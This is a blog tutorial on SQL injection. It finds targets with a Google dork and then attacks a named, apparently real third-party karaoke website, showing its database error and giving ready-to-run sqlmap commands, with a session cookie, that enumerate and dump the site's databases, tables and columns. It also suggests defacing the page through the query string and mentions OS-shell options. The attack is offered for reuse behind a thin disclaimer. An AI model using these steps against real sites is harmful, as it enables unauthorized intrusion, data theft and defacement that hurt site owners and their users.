Hacking remote database using SQL injection

0 / 868
Hackling remote database using SQL injection

What is SQL Injection

 

SQL injection is a technique of injecting malicious SQL queries in query string of a website vulnerable to SQL injection. Using SQL injection, one can take over a vulnerable website by getting access to all data, deface a website, tamper existing website data and a lot more. SQL injection attacks are extremely dangerous and vulnerable websites are at high risk of leaking confidential data which might affect them as well as all it’s stake holders.

In this blog, I will show you how to find out a website vulnerable to SQL injection and thereby exploit the vulnerability using a tool called SQLMap

 

We are going to use google dorks to find out a vulnerable website. If you don’t know what are google dorks, please read my previous blog here

 

Let’s use a simple google dork to find out vulnerable SQLi site as below:-

inurl:index.php?id=

The above will return a large number of search results all of which aren’t obviously vulnerable but certainly are a good candidate for SQL injection attacks if they do not sanitize the query string properly and thus execute the injected SQL query. 

 

Quick check to find SQL injection vulnerability

 


Out of the search results , returned by the above google search, I spotted a website karaoke.co.nz, vulnerable to SQL injection. Visiting the URL, http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote at the end of this URL, shows that it’s not able to sanitize query strings properly. Check this URL:-

http://karaoke.co.nz/items/index.php?id=37′ which gives the below error:-

 



Unable to query local database to select IdentifierYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ”’ at line 1
select * from Category where Identifier = 37′

 

Below is a partial dump of one of the DB tables of this site:-

 

 

SQLMAP DUMP

 

 

 

 

To use SQLMap, download and install python first from here. Once done, download and install SQLMap from here

Once installed , go to the location where sqlmap is installed and type the below command to get familiarized with SQLMap

 

sqlmap.py --help
 
It will show the below results with various options provided by it
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.3.11#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
Usage: sqlmap.py [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
 
  General:
    These options can be used to set some general working parameters
 
    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target
 
  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users
 
 

 

 

 

 

 

 

 

 

Use the below SQLMap commands to dump all the databases of the vulnerable site

python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D database  --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
The above will return database names. claireg_karaoke and information_schema in this case.
Use the below commands to get list of tables and other diagnostic data out of those databases.
python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke --tables  --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema --tables  --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
Once we have table names, let’s get the column names using below commands:-
python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke --tables -T  --columns  "*" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

 

 

python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema --tables -T 
--columns  "*" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
The above commands “sqlmap-4” & “sqlmap-5” will return columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need.

Once you have the column names, you can dump their values using the below commands

 

python d:\sqlmap\sqlmap.py  -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema -T PLUGINS --columns   --cookie="security=low; 
PHPSESSID=e8495b455c5ef26c415ab480425135ee" -C 
LOAD_OPTION, PLUGIN_AUTH_VERSION, PLUGIN_AUTHOR, PLUGIN_DESCRIPTION, PLUGIN_LIBRARY, PLUGIN_LIBRARY_VERSION, PLUGIN_LICENSE, PLUGIN_MATURITY, 
PLUGIN_NAME, PLUGIN_STATUS, PLUGIN_TYPE, PLUGIN_TYPE_VERSION, PLUGIN_VERSION --dump

It’s also possible to dump the entire database using the option –dump-all

 

What more can be done to exploit this vulnerability ? Let’s try to manipulate the query string and change the html webpage

 

Since, the website is not able to sanitize the query string, we can insert an image in the HTML page by tampering the query string. The below link shows the exploit

 

 

 Happy hacking !!

 

Disclaimer:- The content is for educational purpose only. Any unethical usage of the info on this website is not my responsibility.

 

Like us at GolibraryIndia to get regular updates.  

 

Comments

comments


An avid reader, responsible for generating creative content ideas for golibrary.co. His interests include algorithms and programming languages. Blogging is a hobby and passion.
loading...

Related Posts